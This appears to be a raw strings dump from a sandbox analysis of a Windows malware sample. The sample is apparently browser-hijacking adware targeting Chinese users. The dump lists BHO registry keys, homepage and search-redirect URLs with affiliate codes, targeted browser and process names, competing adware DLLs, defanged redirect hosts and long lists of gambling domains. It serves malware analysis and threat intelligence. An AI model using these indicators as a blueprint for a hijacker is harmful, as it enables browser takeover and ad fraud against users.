Connecting to %s.
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
ECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d

86ae56633941c20e9a65a719b5a2208.exe_2388_rwx_001E0000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

86ae56633941c20e9a65a719b5a2208.exe_2388_rwx_002B0000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

86ae56633941c20e9a65a719b5a2208.exe_2388_rwx_00533000_00002000:

<requestedExecutionLevel level="requireAdministrator"/>
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
wsock32.dll
ntdll.dll
Rpcrt4.dll

SearchProtocolHost.exe_3844:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

86ae56633941c20e9a65a719b5a2208.exe_2388_rwx_02BF1000_00182000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
PSAPI.dll
ole32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdStrings.pas
TIdTCPServer
IdTCPServer
CmdDelimiter
TIdTCPServerConnection
DefaultPort
OnExecute
EIdTCPServerError
EIdNoExecuteSpecified
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFilel
OnGetPassword
EIdOSSLLoadingRootCertError8
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP`
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse(
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
TIdHTTP$
HTTPOptions\
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
OnKeyDown
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
olepro32.dll
IWebBrowser
IWebBrowserApph
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNewWindow3
bstrUrlContext
bstrUrl
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowser
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop$
OnWindowSetWidthp
OnWindowSetHeight
#TInternetExplorerWindowSetResizable
TInternetExplorerWindowSetLeft
TInternetExplorerWindowSetTop
TInternetExplorerWindowSetWidth
TInternetExplorerWindowSetHeight
OnWindowSetResizableP
OnWindowSetTop
OnWindowSetWidth<
\DLL\SHDocVw.pas
DefaultInterface is NULL. Component is not connected to Server. You must call 'Connect' or 'ConnectTo' before this operation
1.2.8
TIdUDPBase
IdUDPBase
255.255.255.255
TUDPReadEvent
TIdUDPListenerThread
TIdUDPServer
IdUDPServer
DefaultPortx
OnUDPRead
TIdUDPClient
IdUDPClient
Port<
"TProcess_WinProc_WinHWND_Operating
TMyCheckHttpRedirectUrl
TMyBrowserCheckOpenUrl
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Software\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\
b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7
baidu.3v32.com
.qq.com/
Ínor%o|od~
Ínor%nk~k
%s [%8X][%d]
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\baidu.com
WS2_32.dll
DNSAPI.dll
iexplore.exe
iexplora.exe
Chrome.exe
f1browser.exe
360se.exe
360chrome.exe
360sa.exe
360chroma.exe
SogouExplorer.exe
UCBrowser.exe
.dll, RunIt
windows\system32\svchost.exe
\Windows\SysWOW64\svchost.exe
dllhost.exe
svchost.exe
*.dll
684EF56E-2FAE-4ed2-BF46-F0440C5BE24F
%WinDir%\sysnative\
$%X,$%X;
ids.exe
GameLogin\
<meta http-equiv="Content-Type" content="text/html;charset=gb2312">
http:
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
internet explorer\iexplore.exe
8:;9$8$;$;
ntdll.dll
ADVAPI32.dll
RPCRT4.dll
Secur32.dll
USER32.dll
GDI32.dll
msvcrt.dll
SHLWAPI.dll
SHELL32.dll
iertutil.dll
urlmon.dll
OLEAUT32.dll
IMM32.DLL
LPK.DLL
USP10.dll
IEFRAME.dll
WININET.dll
Normaliz.dll
ws2_32.dll
WS2HELP.dll
VERSION.dll
mswsock.dll
iphlpapi.dll
comdlg32.dll
rasadhlp.dll
MSCTF.dll
xpsp2res.dll
appHelp.dll
CLBCATQ.DLL
COMRes.dll
RASAPI32.dll
rasman.dll
NETAPI32.dll
TAPI32.dll
rtutils.dll
WINMM.dll
USERENV.dll
msv1_0.dll
cryptdll.dll
sensapi.dll
msctfime.ime
IEUI.dll
MSIMG32.dll
msimtf.dll
psapi.dll
SETUPAPI.dll
cscui.dll
CSCDLL.dll
oleacc.dll
xmllite.dll
msfeeds.dll
hnetcfg.dll
wshtcpip.dll
MLANG.dll
SXS.DLL
actxprxy.dll
rsaenh.dll
mshtml.dll
msls31.dll
iepeers.dll
WINSPOOL.DRV
ImgUtil.dll
pngfilt.dll
Dxtrans.dll
ATL.DLL
ddrawex.dll
DDRAW.dll
DCIMAN32.dll
Dxtmsft.dll
jscript.dll
msxml3.dll
CRYPT32.dll
MSASN1.dll
%Program Files%\Internet Explorer\xpshims.dll
%Program Files%\Internet Explorer\ieproxy.dll
Open Url:
DNF.exe
Client.exe
Launcher.exe
QQ.exe
YY.exe
qqbrowser.exe
Juzi.exe
2345chrome.exe
twchrome.exe
opera.exe
115Chrome.exe
Ruiying.exe
SaaYaa.exe
LolClient.exe
ADSafeSe.exe
mk~$ieg%ss
mk~2$idþf
UrlAD:
VVV.baidu.com/s?
Get url Err...
Windows NT\Accessories\
acLuaua.dll
explorer.exe
HintSock.dll
sogou.com
VVV.sogou.com/index.htm?pid=
{D878EB20-C55A-4402-8B25-6387D34F10CB}
{4958F3A2-1032-49af-8BDC-FA4C0C0931ED}
{77EEBB61-8868-4FA1-8A9D-AB54F43C7D92}
{992B79F3-7E84-4C58-AD30-0B72034EC192}
{AF9143FF-D8F3-4ACE-B736-4757B5918388}
{E58EE67D-E279-4C21-B87C-E9DCC9EA6F1F}
{8605FF4E-830B-4E07-A811-FDB48E8BF0BB}
{00000000-0593-4356-9CF7-1D8C2B3343C0}
{452700E0-9F72-421E-8ACC-1948A30751BD}
{505D8605-AB58-4243-8BA0-D7FE50A79698}
{19F620A5-6106-453A-856D-D66E967C45D8}
{F7AD480D-C4A9-4816-96B0-49620E1C1141}
{9D03EDFD-BB04-4E90-AFEA-42B84C6E2141}
{BC10E8CB-3CFA-4F61-A5E1-846506D33FAF}
{7390f3d8-0439-4c05-91e3-cf5cb290c3d0}
{77FEF28E-EB96-44FF-B511-3185DEA48697}
{6E28339B-7C6E-47B6-AEB2-46BA53782379}
{02AC20DD-5548-4CA7-ACCF-18AFE5A4A072}
{3C696E52-BF38-49A8-9017-ACE15A794707}
{4D8CE2EB-5AC8-47F9-8103-3A8AC5B868DF}
{29CF293A-1E7D-4069-9E11-E39698D0AF95}
Software\Microsoft\Internet Explorer\TypedURLs
-AAB6-4EFB-8BD1-
clog.txt
CDCLOG.txt
VVV.sun0769.com
VVV.hg6288.com
2.0.1.60
RestoreTCP
hXXps://VVV.baidu.com/index.php?tn=76035124_3_pg
VVV.baidu.com/index.php?tn=4
VVV.baidu.com/index.php?tn=98012088_dg
VVV.baidu.com/index.php?tn=02049043_32_pg
hXXps://VVV.baidu.com/s?word={searchTerms}&tn=
123.sogou.com/?
hXXps://VVV.sogou.com/sie?
VVV.sogou.com
msdialg100_D.dll
BarClient.exe
BarClientView.exe
b~~z0%%}}}$bkeye
hXXp://88.36q3.com/16?nid=1
hXXp://sss.uc48.com/so11?nid=1
hXXp://22c.i35999.com/221
Beep.pdb
doutray.pdb;
llpro.dll;SeBrowser.dll;IeBrowserEx.dll;Hintf1d.dll;$F09DA8BE96,$61C38F9711;$12CBBF0EC73,$6D2E1BEF02;$D667E38E84,$429A944374;$F5CE5DEB07,$6603847B05;shadowbrowser.dll;shadowbrowser64.dll;
setprox.dll;$D8F1CE9F45,$5DBDA6FB19;$F029D22D98,$499AB4745D;$D6D16940E7,$55E55977AD;$DE1B21F3F3,$57BA15CAD0;$FE19F91D36,$4F9F651426;$D54D673CEE,$5930917415;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;$F6A81C182C,$44B775E5D5;$DB8F7C8E06,$5136D67B4D;
$E3A98697D3,$64B9525505;$EC6AA2F429,$61290336F9;$DBE0A719CB,$55C7A99C24;xyIeBrowserEx64.dll;xyIeBrowserEx.dll;$DEA30A04DE,$532AE2575E;$11CA43E231A,$3553DF44D;setprox64.dll;iebrowserex64.dll;$F8B2783F67,$5CD420FAE9;$D8F1CE9F45,$5DBDA6FB19;
ClassHelper64.dll;$107394245FE,$8196FE5AFD;$E9C88C8864,$557C2A0D84;$DF40EAEC61,$51EEBA0A04;$D954616772,$5885AAFC81;$DB6878D997,$6020424E3E;$2004B09DA,$18EE2EABA3;$D900AAC5C1,$56B846C6F5;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;
$E686C4CB83,$549B9881F3;$123076BB9E5,$63C11BA1B9;$110128099F3,$47CEEE3B04;$ED1DE61550,$51285D60D1;$10CCA5BA968,$52A7D11BA1;$E09B8D30CB,$4F6A65C1A5;$128E8727207,$666DC972F4;redl.dll;$E346DC856A,$51C7617796;$E26F9AF66F,$5E96B00269;$F2FBFA2B33,$537CD26F98;
2345WebProtect
$55101FA7,$87F5D674;$552FC0D0,$881804CC;$5556ECD7,$883CD655;shadowbrowser.dll;$5580C11B,$885AC5D7;$55A316C0,$88818963;$55ACB9D3,$86E18FD2;$557FC656,$86DAA61B;$55B9E5C2,$889F9DBF;$549A873A,$87359EC7;$55D2FC4F,$88B83B70;
$563365F0,$88ECECC3;$549A873A,$87359EC7;$563043CB,$878CA073;$56211FC3,$88DAB657;$55E743A6,$89287619;$5618E898,$88A81031;xyIeBrowserEx.dll;$555C32F1,$88007C70;ProcessHelperWin32.dll;setprox.dll;$55F05A6E,$88D1483C;$55EF9678,$887DED79;
$566E2971,$822ADD8D;$566BB5C9,$88FD25B0;$5649564F,$82030AC8;$52D7749C,$8410FC0A;$5635F79B,$8778CD3B;$55CC53DF,$871EA0C8;$54059963,$854B07CC;$565273FA,$820C7A6B;$56175BED,$88AA686F;$563C1A47,$8778D1F1;$544A1AA4,$86BE90CD;nbie.dll;
$56A9AEEE,$8277D728;$556FD8F3,$884989E3;$572B3DE5,$89FC6E36;$573406D5,$830D9B8B;$572D881E,$8307AA7B;$572B17B6,$886F34AF;$570F9E92,$89DA4694;redl.dll;$570CA22E,$884C5DEB;$5710B2E1,$82EA4A8E;$55EFD26E,$8A31E327;$563B2855,$88F53B9C;$55E743A6,$89287619;
iehelper.dll;msdmo.nls;$2A425E19,$E532110D;$2A425E19,$E533CBAE;$2A425E19,$E5341A95;$2A425E19,$E5352366;$5281D8C1,$8505E31E;$526A2B67,$84F2FF48;$53E5E35B,$856EB8A4;
IEOPTimize.dll;swaddresbar.dll;swntrace.dll;c_2987.nls;ilovehint2.dll;orient.dll;ilovehint.dll;
BACK.pdb;goodtdi.pdb;
b~~z0%þhhs$mi=9$ieg
b~~z0%%xoieggodn$r
*VVV.tyc[0-9].com*
*VVV.tyc[0-9][0-9].com*
*tyc[0-9][0-9][0-9].com*
*tyc[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]tyc.com*
*VVV.[0-9][0-9]tyc.com*
*[0-9][0-9][0-9]tyc.com*
*[0-9][0-9][0-9][0-9]tyc.com*
*VVV.sun[0-9].com*
*VVV.sun[0-9][0-9].com*
*sun[0-9][0-9][0-9].com*
*sun[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]sun.com*
*VVV.[0-9][0-9]sun.com*
*[0-9][0-9][0-9]sun.com*
*[0-9][0-9][0-9][0-9]sun.com*
*VVV.sb[0-9].com*
*VVV.sb[0-9][0-9].com*
*sb[0-9][0-9][0-9].com*
*sb[0-9][0-9][0-9][0-9].com*
*VVV.[0-9][0-9]sb.com*
*VVV.[0-9][0-9][0-9]sb.com*
*[0-9][0-9][0-9][0-9]sb.com*
*VVV.hg[0-9][0-9].com
*VVV.hg[0-9][0-9][0-9].com
*hg[0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.ra[0-9].com*
*VVV.ra[0-9][0-9].com*
*VVV.ra[0-9][0-9][0-9].com*
*ra[0-9][0-9][0-9][0-9].com*
*js[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.xpj[0-9][0-9].com*
*xpj[0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9][0-9].com*
VVV.baidu.com/favicon.ico
VVV.hao123.com/favicon.ico
.com/favicon.ico
üda%
ieadd.adkuai8.com
index.jj123.com.cn
index.hao2016.net
hao.169x.cn
169x.cn
VVV.qidiannet.cn
ok.32wb.com
wbspdh.wicp.net
netbar.6-6.cn
42.62.30.180
dwz.cn
VVV.9973.com
9973.com
61.160.250.4
VVV.msn.com
msn.com
VVV.baiduso.com
baiduso.com
index.114wb.net
114wb.net
123.yhkj9.com
index.58toto.com
ieadd.uc916.com
uc916.com
VVV.apyw.net
VVV.aiwbnet.net
VVV.yaojyw.net
VVV.gt18z.com
union.17lot.com
17lot.com
VVV.v6669.cn
index.icafevip.com
www1.7899987.com
7899987.com
0.baidu.com
VVV.52daohang.com
52daohang.com
index.56wanyx.win
56wanyx.win
VVV.369k.net
227237.com
desk.nmenu.cn
nmenu.cn
yuanyang.d9media.cn
VVV.826826.com
web.sogou.com
123.161gg.com
go.microsoft.com
VVV.114la.com
114.huo99.com
m.browser.baidu.com
index.51wanyx.net
51wanyx.net
index.52icafe.com
52icafe.com
VVV.19so.cn
bmywm.com
interface.wx-media.com
wx-media.com
index.iwb110.com
iwb110.com
17huohu.com
i.17huohu.com
i.firefoxchina.cn
cn.hao123.com
VVV.so26.com
VVV.560560.com
www1.baidu.com
VVV.wz58.com
2345n.sogoulp.com
index.icafe66.com
VVV.jlshoping.com
VVV.hnshoping.com
cn.msn.com
VVV.bmywm.com
wb.soso.com
sogoulp.com
123.5in8.com
hao.5in8.com
VVV.5334.com
daohang2016.com
pownet.net
42.62.30.180/
dwz.cn/OXHad
d9media.cn
web.sogou.com/?
VVV.hao123.com/?tn=
VVV.baidu.com/?tn=
VVV.baidu.com/index.php?tn=
VVV.baidu.com/home?dsp=netbar&tn=
cn.hao123.com/?tn=
VVV.sogou.com/index.htm?pid=sogou-netb-d
VVV.bmywm.com/sg
hao.360.cn/?src=
hao.360.cn/?
123.sogou.com/?71066-
123.sogou.com/?71084-
123.sogou.com/?71013
123.sogou.com/?71021
123.sogou.com/?71032
VVV.sogou.com/index.htm?pid=sogou-netb-c
VVV.pc918.net
//index.woai310.com/index.htm?
VVV.sogou58.com/31077
VVV.tao123.com
VVV.dh18.com
456.huo99.com
huo99.com
hao123.cdsoso.net
VVV.2345.com
VVV.soso.com/?unc=
VVV.soso.com/wbhp.shtml?unc=
wb.soso.com/?unc=
VVV.soso.com/wbhp.shtml?cid=union.s.wh&unc=q
VVV.youdao.com/n3/?keyfrom=netb.yiyong&vendor=netb.yiyong_
VVV.mhkfc.net
VVV.sogou.com/index.htm?pid=sogou-netb-1
VVV.sogou.com/index.htm?pid=sogou-netb-3
VVV.sogou.com/index.htm?pid=sogou-netb-4
VVV.sogou.com/index.htm?pid=sogou-netb-6
VVV.sogou.com/index.htm?pid=sogou-netb-7
VVV.sogou.com/index.htm?pid=sogou-netb-8
VVV.sogou.com/index.htm?pid=sogou-netb-9
VVV.sogou.com/index.htm?pid=sogou-netb-2e7c
VVV.sogou.com/index.htm?pid=sogou-netb-b
VVV.sogou.com/index.htm?pid=sogou-netb-c20
VVV.2345.com/?
VVV.hao123.com/?tn=96012662_hao_pg
VVV.hao123.com/?tn=96994152_hao_pg
123.sogou.com/?71063-5
VVV.hao123.com/?tn=99123885_hao_pg
VVV.hao123.com/?tn=94287050_hao_pg
VVV.hao123.com/?tn=92823465_hao_pg
VVV.hao123.com/?tn=93908426_hao_pg
VVV.hao123.com/?tn=90567778_hao_pg
hao123.com/?tn=91163052_hao_pg
123.sogou.com/?71069-1004
VVV.baidu.com/s?tn=32
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\dnsset
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\ZWebNds
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\stans
MainProX.exe*5C9389C539DDEAFFA58BF110B8ED8F03
wxpro.dll
Busiwork.dll
swaddresbar.dll
loguser.dll
WxVSafe.dll
lolhelper.dll
wxcore.dll
rmserver.exe
exploren.exe
services.exe
lexplore.exe
fbrowser.exe
qqbrowse.exe
360chrom.exe
TaBrowse.exe
Explore.exe
taskmgr.exe
tasklis.exe
Service.exe
NOTEPAD.EXE
control.exe
conhost.exe
clipbrd.exe
command.com
comhost.exe
comtrol.exe
taskmur.exe
Explone.exe
Servlce.exe
contool.exe
connost.exe
fbrowse.exe
Browser.exe
Firefox.exe
lsans.exe
cacis.exe
clsvc.exe
netst.exe
xuean.exe
Brows.exe
Sogou.exe
lleba.exe
ADMon.exe
Chrom.exe
csrss.exe
baidubrowser.exe
2345Explorer.exe
liebao.exe
Maxthon.exe
TheWorld.exe
TaoBrowser.exe
7chrome.exe
FastIE.exe
350chrome.exe
ttraveler.exe
MiniIE.EXE
VVV.hao123.com
VVV.baidu.com
hXXps://123.sogou.com/?71163-0897
71163-0897
h88eg.com
w11e2.com
8e789.com
daben08.com
88jt66.com
029zhuangshi.com
VVV.ag983.com
307858.com
shgw123.com
00003801.com
95990011.net
66bcdf.com
glyn88.com
game88city.com
clever-china.com
sqzl99.com
cmp8d.com
80651.com
0512bgy.com
0756sys.com
pj3516.com
jinleyigou.com
727330.com
emai60.com
mmxx55.com
jkgdq.com
VVV.bmw9.com
aaa01234.com
0008109.com
5556163.com
dh2665.com
ifeng888896.com
VVV.bxchc.com
VVV.bxcho.com
VVV.bxchp.com
hgw1109.com
ty1400.com
ylg6696.com
jkgqs.com
66.133.87.55
jkgqm.com
25175704.com
gdhzxd.com
VVV.4616.com
VVV.4707.com
jkgqt.com
VVV.ay039.com
lkj9875.com
w6603.com
jkhhq.com
wxc7700.com
x33138.com
xbao99.com
9599110.com
9599hh.net
x993.com
zz402.com
f402.com
58757.com
173.255.138.123
youyou456.com
VVV.jkhwq.com
9599mm.net
cqgj0.com
xbyl345.com
tbet88.com
y33138.com
VVV.itb66.com
xinbao169.com
qiangui666.com
yuebet188.com
hao555666.com
pp88086.com
ay159.com
860923.top
85850z.com
VVV.665252.com
nbboard.com
heshangmeng.net
s88ab.com
qy8100.com
VVV.bb868.com
VVV.bo7727.com
2130.qg790.com
bwin2020.com
vic76.com
jiuwuzhizun11.com
95zz00.com
jwzzgw4.cc
882828.net
jjxieqiaoxx.com
9599333.com
VVV.565.net
yuefabo.com
ylg6266.com
VVV.mf9999.com
VVV.yh478.net
29salon.com
VVV.478001.com
478vip.com
VVV.48111.com
my63303.com
VVV.88928.com
VVV.21222.com
bogou888.com
VVV.31999.com
tycjt1.com
long772.com
VVV.63365.com
VVV.656995.com
VVV.3505.com
VVV.2138s.com
jin3388.com
xam31999.com
ty1299.com
VVV.145a.com
www-57365.com
VVV.880ms.com
555050.com
ylg2299.com
886868.net
59bo.cc
dh5524.com
95996666.net
VVV.0008.com
xinyu588.com
VVV.8-88d.com
9000402.com
moca777.com
VVV.itb88.com
yo86567.com
111f11.com
www-23456.com
jwzzgw.cc
jiuwuzhizun11.cc
tbbet8888.com
zr88a.cc
aygj77.com
VVV.s138x.com
js00697.com
qwe654.com
VVV.aygj5.com
aoyayule.com
VVV.ay741.com
yo84756.com
haomatang.com
2221402.com
vns255.com
VVV.x6168.com
shangshangchuanmei.com
k178.vcevv.cn
weebly.com
gdzfcn.com
tbfastfast888.com
ty443.com
js9980.com
VVV.shhbm.com
wns707.com
VVV.7999.cc
ylg2099.com
86666.8994.com
aoya113.com
fa97463.com
VVV.ay951.com
VVV.farmer.com.cn
score.365rich.cn
VVV.8ff77.com
0316ga.com
600.cc
VVV.88jt.net
dafabet.com
VVV.ccav5.com
arsenal.com.cn
VVV.2246.com
88jt88.com
28365365.com
VVV.7m.cn
VVV.9599aa.com
VVV.yl8886.com
bwin0055.com
yzc178.com
VVV.ca88.com
wofacai.com
jiuwuzhizun6.cc
uu11.cc
1p111.com
jwzzgw2.com
VVV.88jt.cc
95zz44.com
df011.com
95990777.net
anyaoying.com
2p222.com
95zz88.com
dafa888.asia
jiuwuzhizun6.com
95zz08.com
517888.net
95992828.cc
VVV.jxhu.com
VVV.cmp8.com
VVV.9178b.com
long8.cc
b1888.cc
95992828.net
biz5.sandai.net
VVV.tycyyy.com
ylg8838.com
yzc363.com
chunv55.com
VVV.9177b.com
yusheedu.com
dafa888.com
VVV.hllzsxa.com
dy7777.com
VVV.6625ss.com
xiudu868.com
95995858.cc
95998888.cc
xin1946.com
qiangui678.com
jwzzgw6.com
95zz11.com
885858.cc
yz188.com
VVV.hfyj.net
VVV.91ent.com
ad.148021.com
yzc262.com
95993838.cc
VVV.ca881.com
5555.ht
VVV.58js.com
aobo8.net
VVV.b138.cc
VVV.cr1118.com
VVV.df888.com
VVV.dfbet.com
VVV.dfbet.net
VVV.y8.cc
VVV.y9.cc
VVV.yxlm.cc
VVV.tyc.com
VVV.vn66.com
VVV.w88.com
hgbet222.com
VVV.m99.com
VVV.mg.cc
dafa888.cm
gcgc915.com
hailifang.com
hg0088.com.so
hg0088.net
hga8800.com
hgw025.com
jsc9988.com
s8s.cc
5060001.com
2055aaa.com
VVV.m402.com
VVV.660022.com
95990044.cc
1bet999.com
ad.050122.com
88jt03.com
VVV.9599gg.com
1006163.com
dy8811.com
px0311.com
9911tyc.com
ty442.com
amws1199.com
yrmt168.com
jwzzgw6.cc
0006163.com
VVV.ay017.com
88jt33.net
zuijiabo.com
VVV.y9.tt
95993838.net
VVV.s138y.com
dafa91.cn
tongbo8888.com
51taotaoyou.com
VVV.ll-49.com
vip1922.com
050ab29.com
9882011.com
w88wap.com
63bdg.com
47.89.30.97
5345yy.com
yzc1188.com
VVV.111146.com
9927qqq.com
b365444.com
aygj587.com
hb3333.com
